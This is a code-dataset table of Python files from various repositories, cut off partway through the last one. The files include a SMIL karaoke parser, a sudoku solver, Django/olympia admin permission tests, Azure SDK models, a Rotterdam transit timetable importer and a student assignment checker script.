code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
---|---|---|---|---|---|
import smallsmilhandler
from xml.sax import make_parser
from xml.sax.handler import ContentHandler
import sys
import re
import json
import urllib
class KaraokeLocal:
def Inicializador(self, fichero):
parser = make_parser()
SmilHandler = smallsmilhandler.SmallSMILHandler()
parser.setContentHandler(SmilHandler)
parser.parse(open(sys.argv[1]))
self.Lista = SmilHandler.get_tags()
return self.Lista
def do_local(self):
Datos = self.__str__()
for Dato in Datos.split("\t"):
if Dato[0:3] == "src":
if Dato[5:12] == "http://":
URL = Dato[5:-1]
nombre = URL[5:].split("/")[-1]
urllib.request.urlretrieve(URL, nombre)
def to_json(self, Nombre="-1"):
if Nombre == "-1":
NombreGuardado = sys.argv[1][:-4] + "json"
else:
NombreGuardado = Nombre
with open(NombreGuardado, 'w') as archivojson:
json.dump(self.Lista, archivojson)
def __str__(self):
string = ""
for etiqueta in self.Lista:
for atributo in etiqueta.keys():
string = string + atributo + "\t"
for key in etiqueta[atributo]:
if key[-3:] != '=""':
string = string + key + "\t"
string = string[:-1] + "\n"
return string
if __name__ == "__main__":
Karaoke = KaraokeLocal()
try:
Karaoke.Inicializador(sys.argv[1])
except:
print('Usage: python karaoke.py file.smil')
raise SystemExit
StringEtiquetas = Karaoke.__str__()
print(StringEtiquetas)
Karaoke.to_json()
Karaoke.do_local()
Karaoke.to_json("Local.json")
StringEtiquetas = Karaoke.__str__()
print(StringEtiquetas)
| DanielBarreno/ptavi-p3 | karaoke.py | Python | apache-2.0 | 1,836 |
"""
Code Sources Used:
https://github.com/gioGats/sudoku
http://norvig.com/sudoku.html
"""
import itertools
import sys
import time
import generate_sudoku as gs
# TODO Rewrite definite_fill and indefinite_fill into new functions: update_possible, fill_definite, indefinite_fill
# TODO modify indefinite_fill. BFS testing each node with update_possible+fill_definite combo.
class Puzzle(object):
def __init__(self, string=None):
assert (isinstance(string, str) or isinstance(string, None))
if string is None:
raise NotImplementedError("Random generation not enabled")
else:
self.cell_values = gs.grid_values(string)
self.digits = '123456789'
self.rows = 'ABCDEFGHI'
self.cols = self.digits
self.puzzle_string = ''
def solve(self):
editable_ids = []
for cell_id in self.cell_values:
if self.cell_values[cell_id] is '0':
editable_ids.append(cell_id)
brute_dict = self.get_possible_values(editable_ids)
brute_list = []
brute_list_ids = []
for value in brute_dict.keys():
brute_list_ids.append(str(value))
brute_list.append(list(brute_dict[str(value)]))
for i in range(0, 1000000000, 1000):
if self.brute_gen(brute_list, brute_list_ids, start=0 + i, end=1000 + i):
results = self.cell_values
for r in self.rows:
self.puzzle_string += (''.join(results[r + c] for c in self.cols))
gs.display(self.cell_values)
print('///////////////////')
return self.puzzle_string
print('Options Exhausted')
print('///////////////////')
def get_possible_values(self, values):
values_dict = {}
for i in range(0, len(values), 1):
possible_values = set()
for value in list(self.valid_fill(values[i])):
possible_values.add(str(value))
else:
values_dict[str(values[i])] = possible_values
return values_dict
def brute_gen(self, brute_list, brute_list_ids, start, end):
brute_gen1000 = list(itertools.islice(itertools.product(*brute_list), start, end, 1))
for sequence in brute_gen1000:
send_sequence = list(sequence)
valid_result = self.brute_fill(brute_list_ids, send_sequence)
if valid_result:
return True
else:
for rollback_id in brute_list_ids:
self.cell_values[rollback_id] = '0'
# Keith's WIP Zone: UNDER CONSTRUCTION #################################################################################
'''
def help_brute_fill(self, cell_id, possible_values):
possible_values = list(possible_values)
for i in range(0, len(possible_values), 1):
if self.is_valid(cell_id, possible_values[i]):
self.self.cell_values[cell_id] = possible_values[i]
return 'Set' '''
def valid_fill(self, cell_id):
possible_numbers = list(range(1, 10))
# ISSUE: This loop is very brash. It works, but it could work better.
# noinspection PyUnusedLocal
for n in list(range(3)):
for number in possible_numbers:
if str(number) in (self.cell_values[cell_id2] for cell_id2 in gs.units[cell_id][0]):
possible_numbers.remove(number)
elif str(number) in (self.cell_values[cell_id2] for cell_id2 in gs.units[cell_id][1]):
possible_numbers.remove(number)
elif str(number) in (self.cell_values[cell_id2] for cell_id2 in gs.units[cell_id][2]):
possible_numbers.remove(number)
return ''.join(map(str, possible_numbers))
def brute_fill(self, cell_ids, cell_values):
for i in range(0, len(cell_ids), 1):
self.cell_values[cell_ids[i]] = str(cell_values[i])
for i in range(0, len(cell_ids), 1):
if self.is_valid(cell_ids[i], cell_values[i]):
return True
else:
return False
def is_valid(self, cell_id, cell_value):
peer_cols = gs.units[cell_id][0]
peer_rows = gs.units[cell_id][1]
peer_boxs = gs.units[cell_id][2]
peer_cols.remove(cell_id)
peer_rows.remove(cell_id)
peer_boxs.remove(cell_id)
# input('?')
for cell_id2 in peer_cols:
if self.cell_values[cell_id] == self.cell_values[cell_id2]:
peer_cols.append(cell_id)
peer_rows.append(cell_id)
peer_boxs.append(cell_id)
return False
for cell_id2 in peer_rows:
if self.cell_values[cell_id] == self.cell_values[cell_id2]:
peer_cols.append(cell_id)
peer_rows.append(cell_id)
peer_boxs.append(cell_id)
return False
for cell_id2 in peer_boxs:
if self.cell_values[cell_id] == self.cell_values[cell_id2]:
peer_cols.append(cell_id)
peer_rows.append(cell_id)
peer_boxs.append(cell_id)
return False
peer_cols.append(cell_id)
peer_rows.append(cell_id)
peer_boxs.append(cell_id)
return True
# UNDER CONSTRUCTION ###################################################################################################
if __name__ == '__main__':
f = open('failures.txt', 'w')
try:
num_examples = sys.argv[1]
except IndexError:
num_examples = 100 # Default
# Effective Range: 17-77
print('Generating...')
gs.generate_puzzles(1, 55, 'data/sudoku.txt')
print('Testing brute force, %d examples' % num_examples)
# FUTURE Add random sampling from complete csv
examples = []
sf = open('data/sudoku.txt', 'r').read().replace(',', '').splitlines()
for i in range(0, len(sf), 2):
examples.append([sf[i], sf[i + 1]])
examples.reverse()
global_start = time.time()
trial = success = fail = 0
try:
for ex in examples:
local_start = time.time()
trial += 1
start = ex[0]
solution = ex[1]
puzzle = Puzzle(start)
print("Trial %d of %d:\n" % (trial, num_examples))
puzzle = puzzle.solve()
local_end = time.time()
if puzzle == solution:
print(' success in %.10f seconds' % (local_end - local_start))
success += 1
else:
print(' failure in %.10f seconds' % (local_end - local_start))
# f.write(puzzle.__repr__() + '\n')
fail += 1
raise KeyboardInterrupt
except KeyboardInterrupt:
global_end = time.time()
print('Testing complete in %.10f seconds' % (global_end - global_start))
print('%d suceesses and %d failures in %d trials' % (success, fail, trial))
f.close()
| gioGats/sudoku | v0.1/brute_force.py | Python | gpl-3.0 | 7,084 |
# Copyright 2018 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Data class for orders.
"""
from dataclasses import dataclass
from typing import List
@dataclass
class Shipping:
"""
Data class for shipping information.
"""
address_1: str
address_2: str
city: str
state: str
zip_code: str
email: str
mobile: str
@staticmethod
def deserialize(data):
"""
Helper function for parsing a dict of shipping data to a Shipping object.
Parameters:
data (dict): A dict of shipping data.
Output:
A Shipping object.
"""
if data:
return Shipping(
address_1=data.get('address_1'),
address_2=data.get('address_2'),
city=data.get('city'),
state=data.get('state'),
zip_code=data.get('zip_code'),
email=data.get('email'),
mobile=data.get('mobile')
)
return None
@dataclass
class Order:
"""
Data class for orders.
"""
amount: float
shipping: Shipping
status: str
items: List[str]
id: str = None
@staticmethod
def deserialize(document):
"""
Helper function for parsing a Firestore document to an Order object.
Parameters:
document (DocumentSnapshot): A snapshot of Firestore document.
Output:
An Order object.
"""
data = document.to_dict()
if data:
return Order(
id=document.id,
amount=data.get('amount'),
shipping=Shipping.deserialize(data.get('shipping')),
status=data.get('status'),
items=data.get('items')
)
return None
| GoogleCloudPlatform/serverless-store-demo | app/helpers/orders/data_classes.py | Python | apache-2.0 | 2,324 |
# -*- coding: utf-8 -*-
import json
from unittest import mock
from pyquery import PyQuery as pq
from olympia import amo
from olympia.access.models import Group, GroupUser
from olympia.amo.tests import TestCase, user_factory
from olympia.amo.urlresolvers import reverse
from olympia.files.models import File
from olympia.users.models import UserProfile
from olympia.versions.models import Version
class TestHomeAndIndex(TestCase):
fixtures = ['base/users']
def setUp(self):
super(TestHomeAndIndex, self).setUp()
self.client.login(email='[email protected]')
def test_get_home(self):
url = reverse('admin:index')
response = self.client.get(url, follow=True)
assert response.status_code == 200
assert response.context['user'].username == 'admin'
assert response.context['user'].email == '[email protected]'
def test_django_index(self):
# Can access with full admin.
url = reverse('admin:index')
response = self.client.get(url)
assert response.status_code == 200
doc = pq(response.content)
modules = [x.text for x in doc('a.section')]
assert len(modules) == 20 # Increment as we add new admin modules.
# Redirected because no permissions if not logged in.
self.client.logout()
response = self.client.get(url)
self.assert3xx(response, '/admin/models/login/?'
'next=/en-US/admin/models/')
# Redirected when logged in without enough permissions.
user = user_factory(username='staffperson', email='[email protected]')
self.client.login(email=user.email)
response = self.client.get(url)
self.assert3xx(response, '/admin/models/login/?'
'next=/en-US/admin/models/')
# Can access with a "is_staff" user.
user.update(email='[email protected]')
self.client.login(email=user.email)
response = self.client.get(url)
assert response.status_code == 200
doc = pq(response.content)
modules = [x.text for x in doc('a.section')]
# Admin:Something doesn't give access to anything, so they can log in
# but they don't see any modules.
assert len(modules) == 0
@mock.patch('olympia.accounts.utils.default_fxa_login_url')
def test_django_login_page(self, default_fxa_login_url):
login_url = 'https://example.com/fxalogin'
default_fxa_login_url.return_value = login_url
# Check we can actually access the /login page - django admin uses it.
url = reverse('admin:login')
response = self.client.get(url)
# if you're already logged in, redirect to the index
self.assert3xx(response, '/en-US/admin/models/')
# Redirected to fxa because no permissions if not logged in.
self.client.logout()
response = self.client.get(url)
self.assert3xx(response, login_url)
# But if logged in and not enough permissions return a 403.
user = user_factory(username='staffperson', email='[email protected]')
self.client.login(email=user.email)
response = self.client.get(url)
assert response.status_code == 403
# But can access with a "is_staff" user.
user.update(email='[email protected]')
response = self.client.get(url)
self.assert3xx(response, '/en-US/admin/models/')
@mock.patch('olympia.accounts.utils.default_fxa_login_url')
def test_django_login_page_with_next(self, default_fxa_login_url):
login_url = 'https://example.com/fxalogin'
default_fxa_login_url.return_value = login_url
# if django admin passes on a next param, check we use it.
url = reverse('admin:login') + '?next=/en-US/admin/models/addon/'
response = self.client.get(url)
# redirect to the correct page
self.assert3xx(response, '/en-US/admin/models/addon/')
# Same with an "is_staff" user.
user = user_factory(email='[email protected]')
self.client.login(email=user.email)
response = self.client.get(url)
self.assert3xx(response, '/en-US/admin/models/addon/')
def test_django_admin_logout(self):
url = reverse('admin:logout')
response = self.client.get(url, follow=False)
self.assert3xx(response, '/', status_code=302)
class TestRecalculateHash(TestCase):
fixtures = ['base/addon_3615', 'base/users']
def setUp(self):
super().setUp()
self.client.login(email='[email protected]')
@mock.patch.object(File, 'file_path',
amo.tests.AMOPaths().file_fixture_path(
'delicious_bookmarks-2.1.106-fx.xpi'))
def test_regenerate_hash(self):
version = Version.objects.create(addon_id=3615)
file = File.objects.create(
filename='delicious_bookmarks-2.1.106-fx.xpi', version=version)
r = self.client.post(reverse('zadmin.recalc_hash', args=[file.id]))
assert json.loads(r.content)[u'success'] == 1
file = File.objects.get(pk=file.id)
assert file.size, 'File size should not be zero'
assert file.hash, 'File hash should not be empty'
@mock.patch.object(File, 'file_path',
amo.tests.AMOPaths().file_fixture_path(
'delicious_bookmarks-2.1.106-fx.xpi'))
def test_regenerate_hash_get(self):
""" Don't allow GET """
version = Version.objects.create(addon_id=3615)
file = File.objects.create(
filename='delicious_bookmarks-2.1.106-fx.xpi', version=version)
r = self.client.get(reverse('zadmin.recalc_hash', args=[file.id]))
assert r.status_code == 405 # GET out of here
class TestPerms(TestCase):
fixtures = ['base/users']
FILE_ID = '1234567890abcdef1234567890abcdef'
def assert_status(self, view, status, follow=False, **kw):
"""Check that requesting the named view returns the expected status."""
assert self.client.get(
reverse(view, kwargs=kw), follow=follow).status_code == status
def test_admin_user(self):
# Admin should see views with Django's perm decorator and our own.
assert self.client.login(email='[email protected]')
self.assert_status('admin:index', 200, follow=True)
def test_staff_user(self):
# Staff users have some privileges.
user = UserProfile.objects.get(email='[email protected]')
group = Group.objects.create(name='Staff', rules='Admin:*')
GroupUser.objects.create(group=group, user=user)
assert self.client.login(email='[email protected]')
self.assert_status('admin:index', 200, follow=True)
def test_unprivileged_user(self):
# Unprivileged user.
assert self.client.login(email='[email protected]')
self.assert_status('admin:index', 403, follow=True)
# Anonymous users should get a login redirect.
self.client.logout()
self.assert3xx(
self.client.get(reverse('admin:index')),
'/admin/models/login/?next=/en-US/admin/models/')
| eviljeff/olympia | src/olympia/zadmin/tests/test_views.py | Python | bsd-3-clause | 7,199 |
from rest_framework import serializers
from ..upload_handling.serializers import ArticleImageSerializer
class ArticleSerializer(serializers.Serializer):
main_title = serializers.CharField(max_length=255)
sub_title = serializers.CharField(max_length=255)
author = serializers.CharField(max_length=255)
image = ArticleImageSerializer()
date = serializers.CharField(max_length=40)
text = serializers.CharField()
| REBradley/WineArb | winearb/articles/serializers.py | Python | bsd-3-clause | 435 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import msrest.serialization
class StsTokenResponseMessage(msrest.serialization.Model):
"""Represents a token response message from the STS service.
All required parameters must be populated in order to send to Azure.
:param access_token: Required. An access token for the account.
:type access_token: str
"""
_validation = {
'access_token': {'required': True},
}
_attribute_map = {
'access_token': {'key': 'AccessToken', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StsTokenResponseMessage, self).__init__(**kwargs)
self.access_token = kwargs['access_token']
class TokenRequestOptions(msrest.serialization.Model):
"""Parameter group.
:param client_request_id: The client request correlation vector, which should be set to a new
value for each request. Useful when debugging with Microsoft.
:type client_request_id: str
"""
_attribute_map = {
'client_request_id': {'key': 'clientRequestId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TokenRequestOptions, self).__init__(**kwargs)
self.client_request_id = kwargs.get('client_request_id', None)
| Azure/azure-sdk-for-python | sdk/mixedreality/azure-mixedreality-authentication/azure/mixedreality/authentication/_generated/models/_models.py | Python | mit | 1,715 |
from kv1_811 import *
from inserter import insert,version_imported,reject,setRefsDict,simple_dict_insert
from bs4 import BeautifulSoup
import urllib2
from datetime import datetime,timedelta
import logging
from settings.const import *
logger = logging.getLogger("importer")
getPool = getFakePool811
def getDataSource():
return { '1' : {
'operator_id' : 'RET',
'name' : 'RET KV1',
'description' : 'RET KV1 leveringen',
'email' : None,
'url' : None}}
def getOperator():
return { 'RET' : {'privatecode' : 'RET',
'operator_id' : 'RET',
'name' : 'RET',
'phone' : '0900-5006010',
'url' : 'http://www.ret.nl',
'timezone' : 'Europe/Amsterdam',
'language' : 'nl'}
}
def setLineColors():
conn = psycopg2.connect(database_connect)
cur = conn.cursor()
cur.execute("""
UPDATE line set color_shield = '00b43f', color_text= 'ffffff' WHERE operator_id = 'RET:M006';
UPDATE line set color_shield = 'ffdd00', color_text= '000000' WHERE operator_id = 'RET:M007';
UPDATE line set color_shield = 'e32119', color_text= '000000' WHERE operator_id = 'RET:M008';
UPDATE line set color_shield = '003a8c', color_text= 'ffffff' WHERE operator_id = 'RET:M010';
UPDATE line set color_shield = '34b4e4', color_text= '000000' WHERE operator_id = 'RET:M009';
""")
cur.close()
conn.commit()
conn.close()
def recycle_journeyids(conn,data):
cur = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
cur.execute("""
create temporary table NewJourney(
id bigserial primary key NOT NULL,
privatecode varchar(255) NOT NULL,
operator_id varchar(255) NOT NULL,
availabilityconditionRef integer NOT NULL,
journeypatternref integer NOT NULL,
timedemandgroupref integer NOT NULL,
productCategoryRef integer,
noticeassignmentRef integer,
departuretime integer,
blockref varchar(255),
name varchar(255),
lowfloor boolean,
hasLiftOrRamp boolean,
haswifi boolean,
bicycleAllowed boolean,
onDemand boolean,
isvirtual boolean default(false)
);
""")
for key,journey in data['JOURNEY'].items():
journey = deepcopy(journey)
setRefsDict(journey,data['AVAILABILITYCONDITION'],'availabilityconditionref')
setRefsDict(journey,data['JOURNEYPATTERN'],'journeypatternref')
setRefsDict(journey,data['TIMEDEMANDGROUP'],'timedemandgroupref')
setRefsDict(journey,data['NOTICEASSIGNMENT'],'noticeassignmentref',ignore_null=True)
setRefsDict(journey,data['PRODUCTCATEGORY'],'productcategoryref')
exists,id = simple_dict_insert(conn,'NEWJOURNEY',journey,check_existing=False,return_id=True)
cur.execute("""
SELECT jn.operator_id,jo.id,jn.id as tmp_id
FROM
journey as jo,newjourney as jn
WHERE
jo.departuretime = jn.departuretime AND
jo.privatecode = jn.privatecode AND
jo.availabilityconditionref NOT IN (SELECT DISTINCT availabilityconditionref FROM availabilityconditionday WHERE isavailable = true)
""")
for row in cur.fetchall():
data['JOURNEY'][row['operator_id']]['id'] = row['id']
cur.execute("delete from newjourney where id = %s",[row['tmp_id']])
cur.execute("delete from journeytransfers where journeyref = %s or onwardjourneyref = %s",[row['id']]*2)
def generatePool(conn):
cur = conn.cursor()
cur.execute("""
CREATE TEMPORARY TABLE temp_pool as (
SELECT dataownercode,userstopcodebegin,userstopcodeend,transporttype,row_number() OVER (PARTITION BY
dataownercode,userstopcodebegin,userstopcodeend,transporttype ORDER BY index) as index,locationx_ew,locationy_ns
FROM
((SELECT DISTINCT ON (userstopcodebegin,userstopcodeend,transporttype)
dataownercode,userstopcodebegin,userstopcodeend,transporttype,0 as index,locationx_ew,locationy_ns
FROM pool JOIN point using (version,dataownercode,pointcode)
ORDER BY userstopcodebegin,userstopcodeend,transporttype,distancesincestartoflink ASC)
UNION
(SELECT DISTINCT ON (userstopcodebegin,userstopcodeend,transporttype)
dataownercode,userstopcodebegin,userstopcodeend,transporttype,99999 as index,locationx_ew,locationy_ns
FROM pool JOIN point using (version,dataownercode,pointcode)
ORDER BY userstopcodebegin,userstopcodeend,transporttype,distancesincestartoflink DESC)
UNION
SELECT dataownercode,userstopcodebegin,userstopcodeend,transporttype,(dp).path[1] as index,st_x((dp).geom)::integer as
locationx_ew,st_y((dp).geom)::integer as locationy_ns
FROM
(SELECT dataownercode,userstopcodebegin,userstopcodeend,transporttype,st_dumppoints(geom) as dp FROM ret_pool_geom) as x) as pool
ORDER BY dataownercode,userstopcodebegin,userstopcodeend,transporttype,index);
DELETE FROM temp_pool WHERE userstopcodebegin||':'||userstopcodeend||':'||transporttype NOT in (SELECT DISTINCT
userstopcodebegin||':'||userstopcodeend||':'||transporttype FROM ret_pool_geom);
INSERT INTO POINT (
SELECT DISTINCT ON (locationx_ew,locationy_ns)
'POINT',1,'I' as implicit,'RET','OG'||row_number() OVER (ORDER BY locationx_ew,locationy_ns),current_date as validfrom,'PL' as pointtype,'RD' as
coordinatesystemtype,locationx_ew,locationy_ns,0 as locationz, NULL as description
FROM
temp_pool where locationx_ew||':'||locationy_ns not in (select distinct locationx_ew||':'||locationy_ns from point where version = 1)
);
DELETE FROM pool WHERE userstopcodebegin||':'||userstopcodeend||':'||transporttype in (SELECT DISTINCT
userstopcodebegin||':'||userstopcodeend||':'||transporttype FROM temp_pool) and version = 1;
INSERT INTO pool(
SELECT DISTINCT ON (version, dataownercode, userstopcodebegin, userstopcodeend, linkvalidfrom, pointcode, transporttype)
'POOL',l.version,'I',p.dataownercode,p.userstopcodebegin,p.userstopcodeend,l.validfrom as linkvalidfrom,p.dataownercode,pt.pointcode,
SUM(coalesce(st_distance(st_setsrid(st_makepoint(p.locationx_ew,p.locationy_ns),28992),st_setsrid(st_makepoint(prev.locationx_ew,prev.locationy_ns),28992))::integer,0))
OVER (PARTITION BY l.version,p.dataownercode,p.userstopcodebegin,p.userstopcodeend,p.transporttype
ORDER BY p.index
ROWS between UNBOUNDED PRECEDING and 0 PRECEDING) as distancesincestartoflink,
NULL as sgementspeed,NULL as localpointspeed,NULL as description,p.transporttype
FROM
temp_pool as p JOIN link as l USING (dataownercode,userstopcodebegin,userstopcodeend,transporttype)
JOIN (SELECT DISTINCT ON (version,locationx_ew,locationy_ns) version,locationx_ew,locationy_ns,pointcode
FROM POINT ) AS pt USING (locationx_ew,locationy_ns)
LEFT JOIN temp_pool as prev ON (p.index = prev.index +1 AND p.transporttype = prev.transporttype
AND p.userstopcodebegin = prev.userstopcodebegin AND p.userstopcodeend = prev.userstopcodeend));
""")
def getMergeStrategies(conn):
cur = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
cur.execute("""
SELECT 'DATASOURCE' as type,'1' as datasourceref,min(validdate) as fromdate FROM operday GROUP BY dataownercode
""")
rows = cur.fetchall()
cur.close()
return rows
def fixBob(conn):
cur = conn.cursor()
cur.execute("""
update line set linepublicnumber = 'B'||linepublicnumber,linename = 'B'||linename where cast(linepublicnumber as integer) < 20 and transporttype = 'BUS';""")
cur.close
def cleanDest(conn):
cur = conn.cursor()
cur.execute("""
UPDATE dest SET destnamefull = replace(destnamefull,'A ','') WHERE destnamefull like 'A %';
UPDATE dest SET destnamefull = replace(destnamefull,'B ','') WHERE destnamefull like 'B %';
UPDATE dest SET destnamefull = replace(destnamefull,'C ','') WHERE destnamefull like 'C %';
UPDATE dest SET destnamefull = replace(destnamefull,'D ','') WHERE destnamefull like 'D %';
UPDATE dest SET destnamefull = replace(destnamefull,'E ','') WHERE destnamefull like 'E %';
UPDATE dest SET destnamemain = replace(destnamemain,'A ','') WHERE destnamemain like 'A %';
UPDATE dest SET destnamemain = replace(destnamemain,'B ','') WHERE destnamemain like 'B %';
UPDATE dest SET destnamemain = replace(destnamemain,'C ','') WHERE destnamemain like 'C %';
UPDATE dest SET destnamemain = replace(destnamemain,'D ','') WHERE destnamemain like 'D %';
UPDATE dest SET destnamemain = replace(destnamemain,'E ','') WHERE destnamemain like 'E %';
""")
cur.close()
def import_zip(path,filename,version):
meta,conn = load(path,filename)
if datetime.strptime(meta['enddate'].replace('-',''),'%Y%m%d') < (datetime.now() - timedelta(days=1)):
data = {}
data['DATASOURCE'] = getDataSource()
data['VERSION'] = {}
data['VERSION']['1'] = {'privatecode' : 'RET:'+filename,
'datasourceref' : '1',
'operator_id' : 'RET:'+filename,
'startdate' : meta['startdate'],
'enddate' : meta['enddate'],
'error' : 'ALREADY_EXPIRED',
'description' : filename}
logger.info('Reject '+filename+'\n'+str(data['VERSION']['1']))
reject(data)
conn.commit()
conn.close()
return
try:
fixBob(conn)
cleanDest(conn)
generatePool(conn)
data = {}
data['OPERATOR'] = getOperator()
data['MERGESTRATEGY'] = getMergeStrategies(conn)
data['DATASOURCE'] = getDataSource()
data['VERSION'] = {}
data['VERSION']['1'] = {'privatecode' : 'RET:'+filename,
'datasourceref' : '1',
'operator_id' : 'RET:'+filename,
'startdate' : meta['startdate'],
'enddate' : meta['enddate'],
'description' : filename}
data['DESTINATIONDISPLAY'] = getDestinationDisplays(conn)
data['LINE'] = getLineWithGeneratedNames(conn)
data['STOPPOINT'] = getStopPoints(conn)
data['STOPAREA'] = getStopAreas(conn)
data['AVAILABILITYCONDITION'] = getAvailabilityConditionsUsingOperday(conn)
data['PRODUCTCATEGORY'] = getBISONproductcategories()
data['ADMINISTRATIVEZONE'] = getAdministrativeZones(conn)
timedemandGroupRefForJourney,data['TIMEDEMANDGROUP'] = calculateTimeDemandGroups(conn)
routeRefForPattern,data['ROUTE'] = clusterPatternsIntoRoute(conn,getPool811)
data['JOURNEYPATTERN'] = getJourneyPatterns(routeRefForPattern,conn,data['ROUTE'])
data['JOURNEY'] = getJourneys(timedemandGroupRefForJourney,conn)
data['NOTICEASSIGNMENT'] = {}
data['NOTICE'] = {}
data['NOTICEGROUP'] = {}
insert(data,recycle_journeyids=recycle_journeyids)
conn.close()
setLineColors()
except:
raise
def download(url,filename):
u = urllib2.urlopen(url)
f = open('/tmp/'+filename, 'wb')
meta = u.info()
file_size = int(meta.getheaders("Content-Length")[0])
print "Downloading: %s Bytes: %s" % (filename, file_size)
file_size_dl = 0
block_sz = 8192
while True:
buffer = u.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl * 100. / file_size)
status = status + chr(8)*(len(status)+1)
print status,
print
f.close()
import_zip('/tmp',filename,None)
url = 'http://data.ndovloket.nl/RET/'
def sync():
f = urllib2.urlopen(url+'?order=d')
soup = BeautifulSoup(f.read())
for link in soup.find_all('a'):
link = link.get('href')
filename = urllib2.unquote(link)
if '.zip' in link.lower():
if not version_imported('RET:'+filename):
try:
logger.info('Importing :'+filename)
download(url+link,filename)
except Exception as e:
logger.error(filename,exc_info=True)
pass
| bliksemlabs/bliksemintegration | importers/ret.py | Python | bsd-2-clause | 12,326 |
# Python3
# 有限制修改區域
def fixResult(result):
def fix(x):
return x // 10
return list(map(fix, result))
| RevansChen/online-judge | Codefights/arcade/python-arcade/level-6/36.Fix-Result/Python/solution1.py | Python | mit | 132 |
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
The downloader main module.
It creates a GUI window with the help of Mypanel class.
It import:
-wx
-Mypanel from class_Mypanel
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
"""Required modules"""
import wx
from class_Mypanel import Mypanel
#----------------------------------------------------------------------
def main():
'''
The main function which creates the window and box objects and uses
Mypanel class for creating widgets and binding events.
'''
app = wx.App()
#window object
win = wx.Frame(None,title = "SJdownloader",size=(575,420))
#box object
bkg = wx.Panel(win)
#packing the box
Mypanel(bkg,win)
#show the window
win.Show()
#execute the loop for maintaining the window
app.MainLoop()
#----------------------------------------------------------------------
if __name__ == '__main__':
main()
| curioswati/SJdownloader | sjdownloader/SJdownloader.py | Python | isc | 985 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
Script de comprobación de entrega de ejercicio
Para ejecutarlo, desde la shell:
$ python check.py login_github
"""
import os
import random
import sys
ejercicio = 'X-Serv-16.4-contentPostApp'
student_files = []
repo_files = [
'contentapp.py'
'webapp.py',
'check.py',
'README.md',
'.gitignore',
'.git',
'LICENSE'
]
files = student_files + repo_files
if len(sys.argv) != 2:
print
sys.exit("Usage: $ python check.py login_github")
repo_git = "http://github.com/" + sys.argv[1] + "/" + ejercicio
aleatorio = str(int(random.random() * 1000000))
error = 0
print()
print("Clonando el repositorio " + repo_git + "\n")
os.system('git clone ' + repo_git + ' /tmp/' + aleatorio + ' > /dev/null 2>&1')
try:
github_file_list = os.listdir('/tmp/' + aleatorio)
except OSError:
error = 1
print("Error: No se ha podido acceder al repositorio " + repo_git + ".")
print()
sys.exit()
if len(github_file_list) != len(files):
error = 1
print("Error: número de ficheros en el repositorio incorrecto")
for filename in files:
if filename not in github_file_list:
error = 1
print("\tError: " + filename + " no encontrado en el repositorio.")
if not error:
print("Parece que la entrega se ha realizado bien.")
print()
print("La salida de pep8 es: (si todo va bien, no ha de mostrar nada)")
print()
for filename in student_files:
if filename in github_file_list:
os.system('pep8 --repeat --show-source --statistics /tmp/'
+ aleatorio + '/' + filename)
else:
print("Fichero " + filename + " no encontrado en el repositorio.")
print()
| CursosWeb/X-Serv-16.4-contentPostApp | check.py | Python | gpl-2.0 | 1,710 |
from deeplink import *
from google_apps import *
from salesforce import *
from signing import *
from views import *
| anentropic/django-saml2-idp | saml2idp/tests/__init__.py | Python | mit | 116 |
import datetime
import mock
from django.test import TestCase
from comics.aggregator import command
from comics.aggregator.crawler import CrawlerRelease
from comics.aggregator.exceptions import ComicsError
from comics.core.models import Comic
def create_comics():
Comic.objects.create(slug='xkcd')
Comic.objects.create(slug='sinfest')
class AggregatorConfigTestCase(TestCase):
def setUp(self):
create_comics()
self.cc = command.AggregatorConfig()
def test_init(self):
self.assertEquals(0, len(self.cc.comics))
self.assertEquals(None, self.cc.from_date)
self.assertEquals(None, self.cc.to_date)
def test_init_invalid(self):
self.assertRaises(
AttributeError, command.AggregatorConfig, options=True)
def test_set_from_date(self):
from_date = datetime.date(2008, 3, 11)
self.cc._set_from_date(from_date)
self.assertEquals(from_date, self.cc.from_date)
def test_set_from_date_from_string(self):
from_date = datetime.date(2008, 3, 11)
self.cc._set_from_date(str(from_date))
self.assertEquals(from_date, self.cc.from_date)
def test_set_to_date(self):
to_date = datetime.date(2008, 3, 11)
self.cc._set_to_date(to_date)
self.assertEquals(to_date, self.cc.to_date)
def test_set_to_date_from_string(self):
to_date = datetime.date(2008, 3, 11)
self.cc._set_to_date(str(to_date))
self.assertEquals(to_date, self.cc.to_date)
def test_validate_dates_valid(self):
self.cc.from_date = datetime.date(2008, 3, 11)
self.cc.to_date = datetime.date(2008, 3, 11)
self.assertTrue(self.cc._validate_dates())
self.cc.from_date = datetime.date(2008, 2, 29)
self.cc.to_date = datetime.date(2008, 3, 2)
self.assertTrue(self.cc._validate_dates())
def test_validate_dates_invalid(self):
self.cc.from_date = datetime.date(2008, 3, 11)
self.cc.to_date = datetime.date(2008, 3, 10)
self.assertRaises(ComicsError, self.cc._validate_dates)
def test_get_comic_by_slug_valid(self):
expected = Comic.objects.get(slug='xkcd')
result = self.cc._get_comic_by_slug('xkcd')
self.assertEquals(expected, result)
def test_get_comic_by_slug_invalid(self):
self.assertRaises(ComicsError, self.cc._get_comic_by_slug, 'not slug')
def test_set_comics_to_crawl_two(self):
comic1 = Comic.objects.get(slug='xkcd')
